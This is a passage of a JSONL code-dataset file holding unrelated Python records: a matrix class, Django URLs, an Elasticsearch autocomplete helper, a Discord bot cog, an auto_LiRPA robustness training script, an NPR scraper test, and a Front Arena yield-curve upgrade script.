Matrix(m1.rows,m1.cols)\n for i in range(m1.rows):\n for j in range(m1.cols):\n res.data[i][j] = m1.data[i][j] + m2.data[i][j]\n return res\n \n def mulScalar(self,n):\n for i in range(self.rows):\n for j in range(self.cols):\n self.data[i][j] *= n\n \n @staticmethod\n def multiply(m1,m2):\n res = Matrix(m1.rows,m2.cols)\n for i in range(m1.rows):\n for j in range(m2.cols):\n for k in range(m1.cols):\n res.data[i][j] += m1.data[i][k]*m2.data[k][j]\n return res\n \n def multiplyElementWise(self,m1):\n for i in range(self.rows):\n for j in range(self.cols):\n self.data[i][j] *= m1.data[i][j]\n \n def set(self,a):\n for i in range(self.rows):\n for j in range(self.cols):\n self.data[i][j] = a[i][j]\n \n def setArray(self,a):\n for i in range(self.rows):\n self.data[i][0] = a[i]\n return self\n \n def transpose(self):\n res = Matrix(self.cols,self.rows)\n for i in range(res.rows):\n for j in range(res.cols):\n res.data[i][j] = self.data[j][i]\n return res\n \n @staticmethod\n def map(mat,fn):\n res = Matrix(mat.rows,mat.cols)\n for i in range(mat.rows):\n for j in range(mat.cols):\n res.data[i][j] = fn(mat.data[i][j])\n return res\n \n @staticmethod\n def copy(source):\n res = Matrix(source.rows,source.cols)\n for i in range(source.rows):\n for j in range(source.cols):\n res.data[i][j] = source.data[i][j]\n return res","sub_path":"Neural Network/Matrix.py","file_name":"Matrix.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"653992540","text":"from django.urls import path\nfrom . import views\n\napp_name = 'member'\n\nurlpatterns = [\n path('',views.login,name='login'),\n path('create/', views.create,name='create'),\n path('update/', views.update,name='update'),\n path('delete/', views.delete,name='delete'),\n path('logout/', views.logout,name='logout'),\n path('confirmemail/',views.confirmemail,name='confirmemail'),\n path('index/',views.index,name='index'),\n path('profile/',views.profile,name='profile'),\n path('order/',views.order,name='order')\n]","sub_path":"member/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"623062805","text":"from db.factory import BasicFactory\nfrom elasticsearch import Elasticsearch, helpers, exceptions\nfrom util import get_params, set_logger\nimport json\n\nbf = BasicFactory()\nconfig = get_params()\nlogger = set_logger('elastic')\n\nes = Elasticsearch(hosts=[{\n 'host': config['elastic']['host'],\n 'port': config['elastic']['port']\n}])\n\n\nclass Elastic:\n INDEX = config['elastic']['index']\n\n def search(self, name):\n \"\"\"\n Autocomplete for movies\n\n :param str name: prefix from search\n :return: movies\n :rtype: dict\n \"\"\"\n message = {'status': False}\n query = {\n 'suggest': {\n 'movie': {\n 'prefix': name,\n 'completion': {\n 'field': 'name',\n 'size': 10\n }\n }\n }\n }\n # if status code is not equal to 200\n try:\n response = es.search(\n index=self.INDEX,\n body=query\n )\n except BaseException:\n return json.dumps(message)\n\n options = response['suggest']['movie'][0]['options']\n\n if response['timed_out'] or len(options) == 0:\n return json.dumps(message)\n\n # similar movie names and movies year\n movies = []\n\n for item in options:\n source = item['_source']\n data = {\n 'id': item['_id'],\n 'text': ' '.join(source['name']['input']),\n 'value': source['year'],\n }\n movies.append(data)\n\n message['status'] = True\n message['movies'] = movies[:10]\n\n return json.dumps(message)\n\n def insert_elastic(self):\n \"\"\"\n Insert records to elastic\n\n :return: difference between inserted and sent\n :rtype: int\n \"\"\"\n items = bf.get_items()\n\n actions = []\n\n for item in items:\n action = {\n '_index': self.INDEX,\n '_id': item[0],\n '_source': {\n 'name': {\n 'input': item[1].split(),\n 'weight': int(item[3])\n },\n 'year': item[2],\n },\n }\n actions.append(action)\n\n response = helpers.bulk(es, actions)\n warnings = len(items) - response[0]\n\n if warnings > 0:\n logger.warn(f'An error occurred for {warnings} items')\n\n @staticmethod\n def create_index():\n \"\"\"\n Create index in elastic\n\n :return: status of request\n :rtype: bool\n \"\"\"\n request_body = {\n 'settings': {\n 'number_of_shards': 3,\n 'number_of_replicas': 1\n },\n 'mappings': {\n 'properties': {\n 'name': {\n 'type': 'completion',\n 'preserve_separators': False,\n 'preserve_position_increments': False\n },\n 'year': {\n 'type': 'integer',\n 'index': False\n }\n }\n }\n }\n\n try:\n es.indices.create(\n index=config['elastic']['index'],\n body=request_body\n )\n except exceptions.RequestError as e:\n if e.args[1] == 'resource_already_exists_exception':\n logger.warn('Index already exists')\n return\n\n logger.exception(e.args)\n","sub_path":"util/elastic.py","file_name":"elastic.py","file_ext":"py","file_size_in_byte":3642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"524838578","text":"import functions\r\nimport requests\r\nimport discord\r\nimport random\r\nfrom discord.ext import commands\r\nfrom discord_components import DiscordComponents, Button, ButtonStyle, InteractionType\r\n\r\n\r\nclass Economy(commands.Cog):\r\n def __init__(self, client):\r\n self.client = client\r\n self.session = {}\r\n DiscordComponents(client)\r\n\r\n @commands.command()\r\n async def unbox(self, ctx):\r\n functions.log(ctx.guild.name, ctx.author, ctx.command)\r\n session = random.randint(0, 999999)\r\n self.session[ctx.author.id] = session\r\n\r\n em = discord.Embed(\r\n title=\"Choose a reward!\",\r\n color=0x2f3136\r\n )\r\n\r\n await ctx.send(\r\n embed=em,\r\n components=[\r\n [\r\n Button(style=ButtonStyle.red, label=\"1\"),\r\n Button(style=ButtonStyle.red, label=\"2\"),\r\n Button(style=ButtonStyle.red, label=\"3\")\r\n ]\r\n ]\r\n )\r\n\r\n @unbox.error\r\n async def on_command_error(self, ctx, error):\r\n raise error\r\n\r\n\r\ndef setup(client):\r\n client.add_cog(Economy(client))\r\n","sub_path":"cogs/economy.py","file_name":"economy.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"57944731","text":"import argparse, random, pickle, os, pdb, time\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nfrom examples.language.data_utils import load_data, get_batches\nfrom examples.language.Transformer.BERT import BERT\nfrom examples.language.lstm import LSTM\nfrom auto_LiRPA.utils import AverageMeter, logger\nfrom auto_LiRPA.perturbations import PerturbationLpNorm, PerturbationSynonym\nfrom auto_LiRPA.bound_general import BoundGeneral\nfrom pytorch_pretrained_bert.optimization import BertAdam\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\"--train\", action=\"store_true\")\nparser.add_argument(\"--robust\", action=\"store_true\")\nparser.add_argument(\"--oracle\", action=\"store_true\")\nparser.add_argument(\"--dir\", type=str, default=\"model\")\nparser.add_argument(\"--data\", type=str, default=\"sst\", choices=[\"sst\"])\nparser.add_argument(\"--seed\", type=int, default=0)\nparser.add_argument(\"--device\", type=str, default=\"cuda\", choices=[\"cuda\", \"cpu\"])\n\nparser.add_argument(\"--ptb\", type=str, default=\"synonym\", \n choices=[\"synonym\"])\nparser.add_argument(\"--eps\", type=float, default=0.01)\nparser.add_argument(\"--budget\", type=int, default=3)\nparser.add_argument(\"--verbose_bound\", action=\"store_true\")\nparser.add_argument(\"--ibp\", action=\"store_true\")\nparser.add_argument(\"--kappa\", type=float, default=0.8)\nparser.add_argument(\"--check\", action=\"store_true\")\nparser.add_argument(\"--method\", type=str, default=\"None\",\n choices=[None, \"forward\", \"backward\"])\nparser.add_argument(\"--res_file\", type=str, default=None)\n\nparser.add_argument(\"--model\", type=str, default=\"transformer\",\n choices=[\"transformer\", \"lstm\"])\nparser.add_argument(\"--num_epochs\", type=int, default=20) \nparser.add_argument(\"--num_epochs_all_nodes\", type=int, default=5) \nparser.add_argument(\"--num_epochs_warmup\", type=int, default=1) \nparser.add_argument(\"--log_interval\", type=int, default=10)\nparser.add_argument(\"--min_word_freq\", type=int, default=2)\nparser.add_argument(\"--use_bert\", action=\"store_true\")\nparser.add_argument(\"--batch_size\", type=int, default=32)\nparser.add_argument(\"--oracle_batch_size\", type=int, default=256)\nparser.add_argument(\"--gradient_accumulation_steps\", type=int, default=1)\nparser.add_argument(\"--max_sent_length\", type=int, default=32)\nparser.add_argument(\"--vocab_size\", type=int, default=50000)\nparser.add_argument(\"--lr\", type=float, default=1e-4)\nparser.add_argument(\"--grad_clip\", type=float, default=None)\nparser.add_argument(\"--num_labels\", type=int, default=2) \nparser.add_argument(\"--num_layers\", type=int, default=1)\nparser.add_argument(\"--num_attention_heads\", type=int, default=4)\nparser.add_argument(\"--hidden_size\", type=int, default=64) # 256\nparser.add_argument(\"--embedding_size\", type=int, default=64) # 256\nparser.add_argument(\"--intermediate_size\", type=int, default=128) # 512\nparser.add_argument(\"--hidden_act\", type=str, default=\"relu\")\nparser.add_argument(\"--layer_norm\", type=str, default=\"no_var\",\n choices=[\"standard\", \"no\", \"no_var\"])\n\nargs = parser.parse_args() \n\ndef build_perturbation():\n if args.ptb == \"lp_norm\":\n return PerturbationLpNorm(norm=np.inf, eps=args.eps) \n elif args.ptb == \"synonym\":\n return PerturbationSynonym(budget=args.budget)\n else:\n raise NotImplementedError\n\ndef scale_gradients(optimizer, gradient_accumulation_steps): \n parameters = []\n for param_group in optimizer.param_groups:\n for param in param_group[\"params\"]:\n parameters.append(param)\n if param.grad is not None:\n param.grad.data /= gradient_accumulation_steps\n if args.grad_clip is not None:\n torch.nn.utils.clip_grad_norm_(parameters, args.grad_clip)\n \ndef convert(model, ptb, batch, verbose=False):\n model.train()\n embeddings, mask, _, _ = model.get_input(batch)\n converted_model = BoundGeneral(\n model.model_from_embeddings, (embeddings, mask), verbose=verbose) \n converted_model.eval()\n model.model_from_embeddings.eval()\n model.model_from_embeddings = converted_model\n\ndef step(model, ptb, batch, eps=1.0, train=False):\n model_bound = model.model_from_embeddings\n if train:\n model.train()\n grad = torch.enable_grad()\n else:\n model.eval()\n grad = torch.no_grad()\n\n with grad:\n embeddings, mask, tokens, label_ids = model.get_input(batch)\n logits = model_bound(embeddings, mask)\n\n if args.robust and eps > 1e-9:\n C = torch.eye(args.num_labels).to(model.device).unsqueeze(0).repeat(len(batch), 1, 1)\n if args.ptb.find(\"lp_norm\") != -1:\n x = embeddings\n else:\n x = (embeddings, tokens, batch)\n\n start_time = time.time()\n ptb.set_eps(eps)\n logits_l, logits_u = model_bound.compute_bounds(\n ptb=ptb, x=x, C=C, IBP=args.ibp, forward=True, method=args.method)\n if args.check:\n # possible when there is no available perturbation\n try:\n assert(torch.min(logits - logits_l) > -1e-3)\n assert(torch.min(logits_u - logits) > -1e-3)\n except:\n pdb.set_trace()\n one_hot = F.one_hot(label_ids, num_classes=args.num_labels)\\\n .to(torch.float32).to(model.device)\n logits_robust = logits_l * one_hot + logits_u * (1. - one_hot)\n else:\n logits_robust = logits\n \n loss_fct = nn.CrossEntropyLoss()\n\n preds = torch.argmax(logits, dim=1)\n acc = torch.sum((preds == label_ids).to(torch.float32)) / len(batch)\n loss = loss_fct(logits, label_ids)\n loss_all = loss\n\n if args.robust:\n preds_robust = torch.argmax(logits_robust, dim=1)\n acc_robust = torch.sum((preds_robust == label_ids).to(torch.float32)) / len(batch)\n loss_robust = loss_fct(logits_robust, label_ids)\n loss_all = args.kappa * loss_robust + (1. - args.kappa) * loss_all\n else:\n acc_robust, loss_robust = acc * 0., loss * 0.\n\n if train:\n loss_all.backward()\n\n acc, loss = acc.detach(), loss.detach()\n acc_robust, loss_robust = acc_robust.detach(), loss_robust.detach()\n\n return acc, loss, acc_robust, loss_robust\n\ndef oracle(model, ptb, data, type):\n logger.info(\"Running oracle for {}\".format(type))\n model.eval()\n assert(isinstance(ptb, PerturbationSynonym))\n cnt_cor = 0\n word_embeddings = model.word_embeddings.weight\n vocab = model.vocab \n for t, example in enumerate(data):\n embeddings, mask, tokens, label_ids = model.get_input([example])\n candidates = ptb.substitution[example[\"sentence\"]]\n if tokens[0][0] == \"[CLS]\":\n candidates = [[]] + candidates + [[]] \n embeddings_all = []\n def dfs(tokens, embeddings, budget, index):\n if index == len(tokens):\n embeddings_all.append(embeddings.cpu())\n return\n dfs(tokens, embeddings, budget, index + 1)\n if budget > 0 and tokens[index] != \"[UNK]\" and len(candidates[index]) > 0\\\n and tokens[index] == candidates[index][0][0]:\n for w in candidates[index][1:]:\n if w[0] in vocab:\n _embeddings = torch.cat([\n embeddings[:index],\n (embeddings[index] \\\n - word_embeddings[vocab[tokens[index]]]\\\n + word_embeddings[vocab[w[0]]]\n ).unsqueeze(0),\n embeddings[index + 1:]\n ], dim=0)\n dfs(tokens, _embeddings, budget - 1, index + 1)\n dfs(tokens[0], embeddings[0], ptb.budget, 0)\n cor = True\n for embeddings in get_batches(embeddings_all, args.oracle_batch_size):\n embeddings_tensor = torch.cat(embeddings).cuda().reshape(len(embeddings), *embeddings[0].shape)\n logits = model.model_from_embeddings(embeddings_tensor, mask) \n for pred in list(torch.argmax(logits, dim=1)):\n if pred != example[\"label\"]:\n cor = False\n if not cor: break\n cnt_cor += cor\n\n if (t + 1) % args.log_interval == 0:\n logger.info(\"{} {}/{}: oracle robust acc {:.3f}\".format(type, t + 1, len(data), cnt_cor * 1. / (t + 1)))\n logger.info(\"{}: oracle robust acc {:.3f}\".format(type, cnt_cor * 1. / (t + 1)))\n \ndata_train_warmup, data_train, data_dev, data_test = load_data(args.data)\nlogger.info(\"Dataset sizes: {}/{}/{}/{}\".format(\n len(data_train_warmup), len(data_train), len(data_dev), len(data_test)))\n\nrandom.seed(args.seed)\nnp.random.seed(args.seed)\ntorch.manual_seed(args.seed)\ntorch.cuda.manual_seed_all(args.seed)\n\nif args.model == \"transformer\":\n model = BERT(args, data_train)\nelif args.model == \"lstm\":\n model = LSTM(args, data_train)\n\ndev_batches = get_batches(data_dev, args.batch_size)\ntest_batches = get_batches(data_test, args.batch_size) \n\nptb = build_perturbation()\nconvert(model, ptb, dev_batches[0], verbose=args.verbose_bound)\nptb.model = model\noptimizer = model.build_optimizer()\nlogger.info(\"Model converted to support bounds\")\n\navg_acc, avg_loss, avg_acc_robust, avg_loss_robust = [AverageMeter() for i in range(4)]\n\ndef train(epoch):\n assert(optimizer is not None)\n if epoch <= args.num_epochs_all_nodes:\n train_batches = get_batches(data_train_warmup, args.batch_size)\n else:\n train_batches = get_batches(data_train, args.batch_size)\n avg_acc.reset()\n avg_loss.reset()\n avg_acc_robust.reset()\n avg_loss_robust.reset() \n if args.robust:\n eps_inc_per_step = 1.0 / (args.num_epochs_warmup * len(train_batches))\n for i, batch in enumerate(train_batches):\n if args.robust:\n eps = min(eps_inc_per_step * ((epoch - - 1) * len(train_batches) + i + 1), 1.0)\n else:\n eps = 0.\n acc, loss, acc_robust, loss_robust = \\\n step(model, ptb, batch, eps=eps, train=True)\n avg_acc.update(acc, len(batch))\n avg_loss.update(loss, len(batch))\n avg_acc_robust.update(acc_robust, len(batch))\n avg_loss_robust.update(loss_robust, len(batch)) \n if (i + 1) % args.gradient_accumulation_steps == 0 or (i + 1) == len(train_batches):\n scale_gradients(optimizer, i % args.gradient_accumulation_steps + 1)\n optimizer.step()\n optimizer.zero_grad() \n if (i + 1) % args.log_interval == 0:\n logger.info(\"Epoch {}, training step {}/{}: acc {:.3f}, loss {:.3f}, acc_robust {:.3f}, loss_robust {:.3f}, eps {:.3f}\".format(\n epoch, i + 1, len(train_batches),\n avg_acc.avg, avg_loss.avg, avg_acc_robust.avg, avg_loss_robust.avg,\n eps\n ))\n model.save(epoch)\n\ndef infer(epoch, batches, type):\n avg_acc.reset()\n avg_loss.reset()\n avg_acc_robust.reset()\n avg_loss_robust.reset() \n for i, batch in enumerate(batches):\n acc, loss, acc_robust, loss_robust = step(model, ptb, batch)\n avg_acc.update(acc, len(batch))\n avg_loss.update(loss, len(batch)) \n avg_acc_robust.update(acc_robust, len(batch))\n avg_loss_robust.update(loss_robust, len(batch)) \n if (i + 1) % args.log_interval == 0:\n logger.info(\"Epoch {}, {} step {}/{}: acc {:.3f}, loss {:.5f}, acc_robust {:.3f}, loss_robust {:.5f}\".format(\n epoch, type, i + 1, len(batches),\n avg_acc.avg, avg_loss.avg, avg_acc_robust.avg, avg_loss_robust.avg\n )) \n logger.info(\"Epoch {}, {}: acc {:.3f}, loss {:.5f}, acc_robust {:.3f}, loss_robust {:.5f}\".format(\n epoch, type,\n avg_acc.avg, avg_loss.avg, avg_acc_robust.avg, avg_loss_robust.avg\n ))\n if args.res_file is not None:\n with open(args.res_file, \"wb\") as file:\n pickle.dump((avg_acc, avg_loss, avg_acc_robust, avg_loss_robust), file)\n\ndef main():\n if args.train:\n for t in range(model.checkpoint, args.num_epochs):\n train(t + 1)\n infer(t + 1, dev_batches, \"dev\")\n infer(t + 1, test_batches, \"test\")\n elif args.oracle:\n oracle(model, ptb, data_test, \"test\")\n else:\n infer(None, test_batches, \"test\")\n\nif __name__ == \"__main__\":\n main()","sub_path":"examples/language/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":12547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"536569924","text":"import unittest\nimport requests\nfrom src.NprScraper import *\n\n\n\nclass MyTestCase(unittest.TestCase):\n url = 'https://api.composer.nprstations.org/v1/widget/519298c7e1c876ffebb2149b/day?date=2020-02-01&format=html'\n\n def test_get(self):\n page = requests.get(self.url)\n self.assertIsNotNone(page)\n\n def test_parse(self):\n page = requests.get(self.url)\n pp = NprScraper()\n pp.parse(page)\n self.assertIsNotNone(pp)\n\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"jazz_scraper/test/jazz_test_0.py","file_name":"jazz_test_0.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"537759227","text":"# This python script template is provided by SunGard Front Arena in order to facilitate a scripted \n# upgrade of yield curves for PRIME 2011.2 (or later). Please refer to SPR 316459 for more \n# information on the changes in yield curve handling in PRIME 2011.2.\n#\n# Note that this script must be customized by each customer in order to select the correct set of\n# yield curves and then perform the preferred set of actions on these yield curves.\n# \n# The default layout of the script below will currently only do the following;\n#\n# 1. Select all yield curve objects (see \"Main Script\" at the end)\n#\n# 2. For each curve that meets the criteria in \"ValidCurve\" (currently the filters only removes all \n# historical yield curves) the script will perform the following actions:\n#\n# * If the curve has estimation_type Boot Strap Alt and Use Benchmark Dates is selected \n#\t=> Clear the Use Benchmark Dates setting\n# * If the curve has benchmarks \n#\t=> Delete all existing yield curve points and generate new benchmark yield curve points \n# * If the curve has yield curve points that has been updated\n#\t=> Calibrate the yield curve and commit new rate values to the ADM\n#\n# Note that it is strongly recommended to always run the script in test mode first and go through \n# the created log.\n#\n# Change log (any chnages made (by Front Arena staff) to the file saved as attachment in FAST \n# should be stated here):\n#\n# 2011-05-18: Intitial version saved in FAST (marlar01)\n#\n\nimport acm\n\n# ---------------------------------------------------------------------------------------------------------\n# ---------------------------------------------------------------------------------------------------------\n# ---------------------------------------------------------------------------------------------------------\n# User Inputs:\n\n# testMode is True if no changes to be committed - only set to False if CERTAIN that your changes are intended.\ntestMode = False\n\n# Filtering. An empty dictionary means \"everything\"\n\n# Only yield curve types that should be upgraded\n# e.g. inputYieldCurveTypes = [\"Benchmark\", \"Spread\"]\nfilterYieldCurveTypes = []\n\n# Only yield curves with the following bootstrap methods will be upgraded\n# e.g. filterDefinedBootstrapMethods = [\"Boot Strap\", \"Boot Strap Alt\"]\nfilterDefinedBootstrapMethods = []\n\n# Only yield curves with the following use benchmark settings will be upgraded\n# e.g. filterUseBenchmarkDatesSettings = [True], or filterUseBenchmarkDatesSettings = [False]\n# or filterUseBenchmarkDatesSettings = [True, False] but this is just the same as filterUseBenchmarkDatesSettings = []\nfilterUseBenchmarkDatesSettings = []\n\n# If you only want to upgrade curves with benchmark or without etc\n# e.g. filterCurveHasBenchmarks = [True] ... etc\nfilterCurveHasBenchmarks = []\n\n# True if you only want to upgrade real time updated curves, False if only non real time updated curves, otherwise empty\n# e.g. filterRealTimeUpdatedCurves = [True] ... etc\nfilterRealTimeUpdatedCurves = []\n\n# Only upgrade curves with the following Currencies, empty means all\n# e.g. filterCurrencyNames = [\"EUR\", \"CHF\", \"SEK\"]\nfilterCurrencyNames = []\n\n# Only upgrade following curves, empty means all\n# e.g. filterCurveNames = [\"EUR-SWAP\"]\nfilterCurveNames = []\n\n# Exclude the following curves from upgrade.\n# (Has higher priority than the positive filters above.)\nexcludeCurveNames = ['ZAR-PRIME'] # ZAR-PRIME agreed with business not to upgrade, according to Anil.\n\n# ---------------------------------------------------------------------------------------------------------\n# ---------------------------------------------------------------------------------------------------------\n# ---------------------------------------------------------------------------------------------------------\n\n# Constants and methods relating to what changes have happened to an upgraded curve -----------------------\nclass UpgradeChange:\n UntoggledUseBenchmarkDatesOnBootstrapAltCurve = 1\n BenchmarkPointsGeneratedAndCalculated = 2\n StorageCalcTypeUpdated = 3\n\nreason = \"Reason\"\naction = \"Action\"\n\ndef ChangeDescription( changeEnum ):\n changeDescription = {}\n changeDescription[reason] = \"\"\n changeDescription[action] = \"\"\n \n if UpgradeChange.UntoggledUseBenchmarkDatesOnBootstrapAltCurve == changeEnum:\n changeDescription[reason] = \"'Use Benchmark Dates' was toggled and Solver input was set to 'Boot Strap Alt'.\"\n changeDescription[action] = \"'Use Benchmark Dates' has been untoggled.\"\n elif UpgradeChange.BenchmarkPointsGeneratedAndCalculated == changeEnum:\n changeDescription[reason] = \"The yield curve contains benchmarks.\"\n changeDescription[action] = \"The yield curve points have been cleared and benchmark points have been generated.\"\n elif UpgradeChange.StorageCalcTypeUpdated == changeEnum:\n changeDescription[reason] = \"The yield curve is of type Spread and has an incompatible pair of IpolRateType and StorageCalcType.\"\n changeDescription[action] = \"StorageCalcType has been set to Spot Rate\"\n else:\n changeDescription[reason] = \"Unknown reason.\"\n changeDescription[action] = \"Unknown action.\"\n \n \n return changeDescription\n# ---------------------------------------------------------------------------------------------------------\n\n\n# Helper functions ----------------------------------------------------------------------------------------\n\n# This method, for the given curve, is intended to determine whether it is acceptable\n# for new benchmark instrument points to be generated or not\ndef CurveIsBenchmarkPointCandidate( yieldCurve ):\n benchmarkSize = yieldCurve.Benchmarks().Size()\n if benchmarkSize > 0:\n return True\n return False\n# ---------------------------------------------------------------------------------------------------------\n \n\n# Changes -------------------------------------------------------------------------------------------------\n# For each change that can be made, there should exist:\n# 1. A Method that takes as parameters: the yield curve, a dictionary that will contain boolean values\n# indicating whether a change was made, and a dictionary containing boolean values indicating\n# whether the change was successful if it was attempted. This method should perform the change on\n# the yield curve, and it should fill the dictionaries, at a key defined in class UpdateChanges, with\n# boolean values flagging if a change was made and whether it was successful, as described above.\n# 2. As implied above, there should be a unique integer member of class UpgradeChanges, that will be\n# used as a key as explained in part 1 above.\n# 3. For each integer member of UpgradeChanges, the method ChangeDescription should return a dictionary\n# that, for the integer, gives a \"Reason\" and an \"Action\" \n\n# Change 1:\ndef UntoggledUseBenchmarkDatesOnBootstrapAltCurveIfNeeded( yieldCurve, changesDictionary, failuresDictionary ):\n failure = False\n changed = False\n \n if (yieldCurve.EstimationType() == \"Boot Strap Alt\") and (yieldCurve.UseBenchmarkDates()) :\n yieldCurve.UseBenchmarkDates( False )\n changed = True\n\n failuresDictionary[UpgradeChange.UntoggledUseBenchmarkDatesOnBootstrapAltCurve] = failure\n changesDictionary[UpgradeChange.UntoggledUseBenchmarkDatesOnBootstrapAltCurve] = changed\n \n \n# Change 2: This method tries to generate new benchmark instrument points, then calculate the curve\ndef GenerateBenchmarkPointsAndCalculate( yieldCurve, changesDictionary, failuresDictionary ):\n failure = False\n changed = False\n \n if CurveIsBenchmarkPointCandidate( yieldCurve ):\n try:\n yieldCurve.GenerateAndLinkPointsFromBenchmarks()\n changed = True\n except:\n failure = True\n\n try:\n yieldCurve.Calculate()\n changed = True\n except:\n failure = True\n \n failuresDictionary[UpgradeChange.BenchmarkPointsGeneratedAndCalculated] = failure\n changesDictionary[UpgradeChange.BenchmarkPointsGeneratedAndCalculated] = changed\n\n\n# Change 3: Prevent the \"invalid properties set\" dialog. (Hynek)\ndef UpdateStorageCalcType(yieldcurve, changesDictionary, failuresDictionary):\n failure = changed = False\n try:\n if (yieldcurve.Type() == 'Spread' and yieldcurve.StorageCalcType() == 'Par FRN Rate' and\n yieldcurve.IpolRateType() == 'Spot Rate'):\n yieldcurve.StorageCalcType('Spot Rate')\n changed = True\n except Exception:\n failure = True\n failuresDictionary[UpgradeChange.StorageCalcTypeUpdated] = failure\n changesDictionary[UpgradeChange.StorageCalcTypeUpdated] = changed\n\n# ---------------------------------------------------------------------------------------------------------\n \n \n# This method \"upgrades\" any curve. As a template, the suggestion is that any curve with\n# estimation type \"Boot Strap Alt\" should have \"Use Benchmark Dates\" untoggled, and secondly,\n# if a curve contains benchmarks, then all points should be cleared, and new points\n# containing these benchmarks should be generated - this is done with the method\n# GenerateBenchmarkPointsAndCalculate().\ndef UpgradeCurve( yieldCurve, changesDictionary, failuresDictionary ):\n # First suggested upgrade action\n UntoggledUseBenchmarkDatesOnBootstrapAltCurveIfNeeded( yieldCurve, changesDictionary, failuresDictionary ) \n \n # Second suggested upgrade action\n GenerateBenchmarkPointsAndCalculate( yieldCurve, changesDictionary, failuresDictionary )\n\n # Custom added upgrade action\n UpdateStorageCalcType(yieldCurve, changesDictionary, failuresDictionary)\n \n\n# Commit the curve only if not in test mode\ndef CommitCurve( yieldCurve, clone ):\n if not testMode:\n try:\n yieldCurve.Apply( clone )\n yieldCurve.Commit()\n except:\n print(\" \"*4 + \"Commit failed - please update curve '\" + yieldCurve.Name() + \"' manually.\")\n\n\n# Logging -------------------------------------------------------------------------------------------------\ndef LogIndividualChanges( yieldCurve, changeDictionary ):\n print(\"\")\n print(\" \"*4 + \"Change details for yield curve '\" + yieldCurve.Name() + \"':\")\n i = 0\n for change in changeDictionary:\n if changeDictionary[change]:\n i = i + 1\n changeDetails = ChangeDescription(change)\n print(\"\")\n print(\" \"*4 + \"Change \" + str(i) + \":\")\n print(\" \"*4 + \"Reason: \" + changeDetails[reason])\n print(\" \"*4 + \"Action: \" + changeDetails[action])\n\ndef LogChanges( yieldCurve, changeDictionary, failureDictionary ):\n changed = False\n failed = False\n\n for change in changeDictionary:\n changed = (changed or changeDictionary[change])\n\n for failure in failureDictionary:\n failed = (failed or failureDictionary[failure])\n \n openingMessage = \"Yield Curve '\" + yieldCurve.Name() + \"'\"\n logIndividualChanges = False\n \n print(\"\")\n print(\"-\"*120)\n \n if failed:\n openingMessage = openingMessage + \" requires upgrade but was not successful. Please open the Yield Curve Definition and upgrade manually.\"\n else:\n if changed:\n openingMessage = openingMessage + \" met the user specified criteria for upgrade, changes were applicable and were made successfully.\"\n logIndividualChanges = True\n else:\n openingMessage = openingMessage + \" met the user specified criteria for upgrade, but no changes were applicable.\"\n \n print(openingMessage)\n \n if logIndividualChanges:\n LogIndividualChanges( yieldCurve, changeDictionary )\n# ---------------------------------------------------------------------------------------------------------\n\n\n# Methods for filtering yield curves to those that the user wants to change -------------------------------\ndef ValidEntry( list, entry ):\n if 0 == len(list):\n return True\n elif entry in list:\n return True\n return False\n\ndef YieldCurveTypeValidity( yieldCurveType ):\n return ValidEntry( filterYieldCurveTypes, yieldCurveType )\n\ndef DefinedBootstrapMethodValidity( definedBootstrapMethod ):\n return ValidEntry( filterDefinedBootstrapMethods, definedBootstrapMethod )\n\ndef UseBenchmarkDatesSettingValidity( useBenchmarkDatesSetting ):\n return ValidEntry( filterUseBenchmarkDatesSettings, useBenchmarkDatesSetting )\n\ndef CurveHasBenchmarkValidity( curveHasBenchmark ):\n return ValidEntry( filterCurveHasBenchmarks, curveHasBenchmark )\n\ndef RealTimeUpdatedCurveValidity( realTimeUpdatedCurve ):\n return ValidEntry( filterRealTimeUpdatedCurves, realTimeUpdatedCurve )\n\ndef CurrencyNameValidity( currencyName ):\n return ValidEntry( filterCurrencyNames, currencyName )\n\ndef CurveNameValidity( curveName ):\n return ValidEntry( filterCurveNames, curveName ) and curveName not in excludeCurveNames\n\n\n# This method determines if, given the user input criteria, whether a given yield curve\n# is a candidate for upgrade\ndef ValidCurve( yieldCurve ):\n if yieldCurve.IsHistorical():\n return False\n if not YieldCurveTypeValidity( yieldCurve.Type() ):\n return False\n if not DefinedBootstrapMethodValidity( yieldCurve.EstimationType() ):\n return False\n if not UseBenchmarkDatesSettingValidity( yieldCurve.UseBenchmarkDates() ):\n return False\n if not CurveHasBenchmarkValidity( yieldCurve.Benchmarks().Size() > 0 ):\n return False\n if not RealTimeUpdatedCurveValidity( yieldCurve.RealTimeUpdated() ):\n return False\n if not CurrencyNameValidity( yieldCurve.Currency().Name() ):\n return False\n if not CurveNameValidity( yieldCurve.Name() ):\n return False\n return True\n# ---------------------------------------------------------------------------------------------------------\n\n\n# ---------------------------------------------------------------------------------------------------------\n# --------------------------------------------- Main Script -----------------------------------------------\n# ---------------------------------------------------------------------------------------------------------\n\n\n\n\n\n\nael_variables = [\n ['firstRunTypes', 'Yield Curve Types for the first run', 'string', None, '', 1, 1, 'Yield Curve types to be upgraded first', None, 1],\n ['secondRunTypes', 'Yield Curve Types for the second run', 'string', None, '', 1, 1, 'Yield Curve types to be upgraded second', None, 1],\n]\ndef ael_main(parameters):\n # Get hold of all yield curves in the database. Note that the Select statement below can be altered\n # in order to select a smaller set of yield curves, for example by using: \n # yieldCurves = acm.FYieldCurve.Select(\"name like 'EUR-SWAP*'\")\n \n yieldCurves = acm.FYieldCurve.Select(\"\")\n\n if testMode:\n print(\"Running in test mode - changes will not be saved\")\n\n print(\"Total Curves in selection: \" + str(len(yieldCurves)))\n\n # Iterate through all curves and for each curve, if the curve meets the criteria specified\n # by method ValidCurve(), then upgrade the curve. Note that by \"upgrade the curve\" is meant\n # \"perform on 